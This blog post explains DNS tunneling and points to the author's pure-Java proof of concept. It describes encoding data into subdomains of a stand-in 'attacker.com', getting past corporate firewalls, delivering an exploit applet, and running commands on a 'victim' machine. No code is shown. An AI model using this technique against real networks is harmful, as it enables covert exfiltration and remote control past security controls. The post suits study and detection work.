DNS tunneling may help you to bypass a firewall if DNS requests are allowed. Or, it can just get you a free Wi-Fi. There are a number standalone tools which allow you to setup a TCP-over-DNS tunnel. Here is a simple implementation of DNS tunneling with pure Java. It’s not ready for using in real world, but it shows an idea how DNS tunneling can be implemented. The implementation works with standard JRE, and doesn’t require any additional library.

What is DNS tunneling?

The purpose of DNS (Domain Name System) protocol is to convert a domain name to an IP address. DNS requests are usually recursive. In other words, if a DNS server doesn’t know how it can resolve a domain name, it can send a request to other DNS servers. Let’s assume that you are in a private network which has a firewall that blocks all connections to the Internet. Or, you just connected to a Wi-Fi spot which doesn’t allow you to connect to the Internet either. Another possible situation is that we were able to deliver an exploit (for example, it may be a Java applet) to some computer in a private network. The exploit gives us an access to some machine in the internal network, but we can’t establish a usual TCP connection to it because of a corporate firewall. If the firewall blocks usual TCP/UDP connections to machines outside the private network, but allows DNS requests, then it may be possible to establish a DNS tunnel which allows to transfer data outside the private network.

Let’s say we have a client inside the private network, and a server outside it. There is a firewall which blocks all connections to the Internet except DNS requests. Now we want to establish a DNS tunnel between those client and server. The server runs its own DNS server which controls a subdomain (let’s say “attacker.com”). The private network has its own internal DNS server. The client wants to send data to the server. To do that, the client can encode the data in BASE32, and make a hostname from it. For example, ‘hello’ string is going to be ‘NBSWY3DP’, so the client builds ‘NBSWY3DP.attacker.com’ hostname string. Then the client sends a request to the internal DNS server to resolve this hostname. The internal DNS server realizes that it can’t resolve this request, so that it forwards the request to our DNS server which is responsible for subdomains of ‘attacker.com’. The firewall is fine with DNS requests. The server decodes the data from BASE32-encoded subdomain, process it, and sends a DNS response which contains data for the client in a TXT field.

Implementation of DNS tunneling with Java

Standard JRE supports DNS protocol out of the box, and doesn’t require any other third-party library. More precisely, it’s part of JNDI (Java Naming and Directory Interface). In other words, if an attacker could deliver a Java applet on a target machine, then the chance to successfully setup a DNS tunnel is quite big (well, now it may not be that easy to make a victim run a malicious applet with new Java versions than it used to be before).

Here is an example which shows an idea how DNS tunneling can be implemented with Java:

https://github.com/artem-smotrakov/java-dns-tunneling

It’s just a proof of concept, and not ready to use in real world. Here are main points:

“src” directory contains Java sources:

“scripts” directory contains some useful scripts:

manifest.mf is a manifest file for a jar. It contains “Permissions” attribute which is required by new Java versions.

DNS tunnel testing

I used a couple of VMs for testing:

As a result, I could type commands in DNSTunnelServer console, and those commands were sent and run on ‘victim’ machine.

Hope you use latest Java versions. If so, you will need to update Java security settings for Java plugin to be able to run the applet (you probably need to decrease security level, and add ‘attacker.com’ to the exclude list).

This project requires Java 8 or higher (it uses some new API introduced in Java 8, and fancy stuff like lambdas), but it doesn’t look hard to adopt it to run with older Java versions.

Originally published at https://blog.gypsyengineer.com on August 29, 2016.

I write about Java, security, electronics and DIY

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store